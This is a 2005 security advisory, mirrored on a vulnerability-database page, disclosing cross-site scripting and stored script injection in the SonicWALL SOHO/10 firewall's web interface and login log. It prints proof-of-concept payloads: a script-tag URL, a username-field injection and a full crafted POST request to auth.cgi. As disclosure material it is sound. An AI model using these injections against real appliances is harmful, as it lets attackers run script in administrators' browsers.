Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sonicwallXSS.txt

🗓️ 17 Apr 2005 00:00:00Reported by Oliver KarowType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

SonicWALL SOHO/10 XSS and Code Injection vulnerability in webroot, allowing script execution in user's environment and system logfile, affecting version Firmware: 5.1.7.0

Code
`SonicWALL SOHO/10 - XSS and Code Injection vulnerability  
========================================================  
  
Product:  
========  
  
SonicWall SOHO/10 is the 2nd generation Internet Security Appliance from  
Sonicwall, with firewall-, vpn-, contentfiltering- and other capabilities.   
  
  
Vulnerability:  
==============  
  
There is a Cross Site Scripting Vulnerability in the webroot.   
A HTTP-GET-request, containing script code will be executed  
in the webbrowsers environment of the user:  
  
  
http://192.168.168.168/<script>alert("Its not magic... its a  
sonic")</script>  
  
  
There is a second vulnerability, which i consider as something between a XSS  
and a code-injection vuln,  
because the user does not have to follow an html-link to run into the  
attack:  
  
If an attacker supplies a username, containing scriptcode, at the login-page  
of the device, an entry in the   
system logfile is done, containing the "username".  
  
The system logfile is displayed in html-format. If the appliance admin is  
viewing the logfile, the scriptcode  
will be executed.  
  
Because length of input field is limited by the browser (client site), you  
can insert a short script  
into the username field to do a quick verification of the existence of the  
vuln:  
  
</TD><script>alert("!")</script>  
  
To supply longer scripts, you have to modify the request f.e. with a proxy,  
or simply sent a modified   
post request via netcat:  
  
  
POST http://192.168.168.168:80/auth.cgi HTTP/1.0  
Accept: */*  
Referer: http://192.168.168.168/auth.html  
Accept-Language: de  
Content-Type: application/x-www-form-urlencoded  
Proxy-Connection: Keep-Alive  
User-Agent: BadGuy  
Host: 192.168.168.168  
Content-Length: 160  
Pragma: no-cache  
  
uName=</TD><script>alert("Its not magic... its a  
sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1  
  
  
  
Version:  
========  
  
I only tested the following version:  
  
SonicWall SOHO/10  
Firmware: 5.1.7.0  
ROM-Version: 4.0.0  
  
Other versions may also be affected.  
  
Vendor:  
=======  
  
Website: http://www.sonicwall.com  
Status: informed  
  
Discovered by:  
==============  
  
Oliver Karow  
Date: 29.03.2005  
Website: http://www.oliverkarow.de/research/sonicwall.txt  
  
--   
Handyrechnung zu hoch? Tipp: SMS und MMS mit GMX  
Seien Sie so frei: Alle Infos unter http://www.gmx.net/de/go/freesms  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Apr 2005 00:00Current
7.4High risk
Vulners AI Score7.4
sonicwall soho/10cross site scriptingcode injectionvulnerabilityfirewallvpncontent filteringhttp get requestsystem logfileusername fieldhtml formatproxynetcatfirmware: 5.1.7.0
33